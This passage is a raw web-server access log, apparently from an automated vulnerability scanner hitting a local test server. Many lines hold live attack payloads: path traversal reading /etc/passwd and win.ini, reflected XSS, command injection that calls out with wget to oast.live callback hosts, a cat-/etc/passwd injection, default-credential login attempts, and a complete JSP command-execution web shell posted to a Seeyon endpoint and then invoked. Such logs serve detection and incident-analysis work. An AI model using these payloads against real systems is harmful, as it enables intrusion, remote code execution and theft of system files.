"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/rest/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fca28fg0smpvbd3qg07h0ajgz5w64cywzc.oast.live%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22action\x22:\x22SSLVPN_Resource\x22,\x22method\x22:\x22deleteImage\x22,\x22data\x22:[{\x22data\x22:[\x22/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt\x22]}],\x22type\x22:\x22rpc\x22,\x22tid\x22:17,\x22f8839p7rqtj\x22:\x22=\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /directdata/direct/router HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"_charset_=utf-8&j_username=author&j_password=author&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://ca28fg0smpvbd3qg07h0yn4hgctgw4fxz.oast.live&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_caps/webCapsConfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pdb/meta/v1/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/portal/10/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV\x0D\x0AOPTION=S3WYOSWLBSGr\x0D\x0AcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\x0D\x0A= WUghPB3szB3Xwg66 the CREATEDATE\x0D\x0ArecordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6\x0D\x0AoriginalFileId = wV66\x0D\x0AoriginalCreateDate = wUghPB3szB3Xwg66\x0D\x0AFILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs\x0D\x0AneedReadFile = yRWZdAS6\x0D\x0AoriginalCreateDate IZ = 66 = = wLSGP4oEzLKAz4\x0D\x0A<%@ page language=\x22java\x22 import=\x22java.util.*,java.io.*\x22 pageEncoding=\x22UTF-8\x22%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\x22\x5Cn\x22);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\x22x\x22.equals(request.getParameter(\x22pwd\x22))&&!\x22\x22.equals(request.getParameter(\x2229KD23fDho8FmYAWkcECmC0cG2M\x22))){out.println(\x22
\x22 +excuteCmd(request.getParameter(\x2229KD23fDho8FmYAWkcECmC0cG2M\x22)) + \x22
\x22);}else{out.println(\x22:-)\x22);}%>6e4f045d4b8506bf492ada7e3390d7ce","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seeyon/htmlofficeservlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"getpwd=WorldFilledWithLove","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"_charset_=utf-8&j_username=anonymous&j_password=anonymous&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A &test;\x0D\x0A \x0D\x0A \x0D\x0A com.jamfsoftware.jamfdistributionserver\x0D\x0A 1652852682\x0D\x0A \x0D\x0A 00000000-0000-0000-0000-000000000000\x0D\x0A com.jamfsoftware.jamf.distributionserverinventoryrequest\x0D\x0A \x0D\x0A 1999\x0D\x0A 1652852682\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 34\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /client HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/GetSrvInfo.exe HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /command.cgi?cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/test123456.jsp?pwd=asasd3344&29KD23fDho8FmYAWkcECmC0cG2M=ipconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD1sYGsfHEdsb6xCG84KsFrgf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"_charset_=utf-8&j_username=jdoe@geometrixx.info&j_password=jdoe&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; 